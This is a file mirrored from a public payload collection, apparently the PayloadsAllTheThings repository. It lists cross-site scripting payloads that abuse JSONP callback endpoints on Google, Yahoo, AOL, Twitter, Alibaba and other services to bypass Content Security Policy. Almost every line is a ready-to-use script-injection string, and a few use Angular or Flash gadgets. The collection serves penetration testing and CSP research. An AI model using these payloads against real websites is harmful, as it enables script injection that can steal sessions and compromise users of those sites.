mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-15 07:42:57 +00:00
aef5bb864a
Added 3 yahoo jsonp endpoints * https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337) * https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337) * https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-
57 lines
5.7 KiB
Text
57 lines
5.7 KiB
Text
#Google.com:
|
|
"><script+src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
|
|
"><script+src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
|
|
"><script+src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
|
|
"><script+src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
|
|
#Blogger.com:
|
|
"><script+src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
|
|
#Yandex:
|
|
"><script+src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
|
|
"><script+src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert"></script>
|
|
#VK.com:
|
|
"><script+src="https://api.vk.com/method/wall.get?callback=alert(1337)"></script>
|
|
#Marketo.com
|
|
"><script+src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
|
|
"><script+src="http://app-e.marketo.com/index.php/form/getKnownLead?callback=alert()"></script>
|
|
#AlibabaGroup:
|
|
"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback=alert(1337)"></script>
|
|
"><script+src="https://suggest.taobao.com/sug?callback=alert(1337)"></script>
|
|
"><script+src="https://count.tbcdn.cn//counter3?callback=alert(1337)"></script>
|
|
"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback=alert(1337)"></script>
|
|
"><script+src="https://wb.amap.com/channel.php?callback=alert(1337)"></script>
|
|
"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback=confirm(1);jsonp1"></script>
|
|
"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794"></script>
|
|
#Uber.com:
|
|
"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
|
|
#AOL/Yahoo
|
|
"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script>
|
|
"><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script>
|
|
"><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script>
|
|
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
|
|
"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
|
|
"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
|
|
"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback=confirm(1);//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>
|
|
"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
|
|
"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback=confirm(9)//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>
|
|
"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback=confirm(9)//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>
|
|
#Twitter.com:
|
|
"><script+src="http://search.twitter.com/trends.json?callback=alert()"></script>
|
|
"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback=confirm()"></script>
|
|
"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback=confirm()"></script>
|
|
#Others:
|
|
"><script+src="https://www.sharethis.com/get-publisher-info.php?callback=alert(1337)"></script>
|
|
"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback=alert(1337)"></script>
|
|
"><script+src="https://passport.ngs.ru/ajax/check?callback=alert(1337)"></script>
|
|
"><script+src="https://ulogin.ru/token.php?callback=alert(1337)"></script>
|
|
"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)"></script>
|
|
"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback=alert(1337)"></script>
|
|
"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback=alert(1337)"></script>
|
|
"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback=alert(1337)"></script>
|
|
"><script+src="https://api.mixpanel.com/track/?callback=alert(1337)"></script>
|
|
"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback=alert(1337)"></script>
|
|
"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback=alert(1);/json"></script>
|
|
"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback=confirm(1);//window.proper_d31c1edc_57a8d6de_38"></script>
|
|
#GoogleAPI's
|
|
"><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
|
|
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
|
|
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
|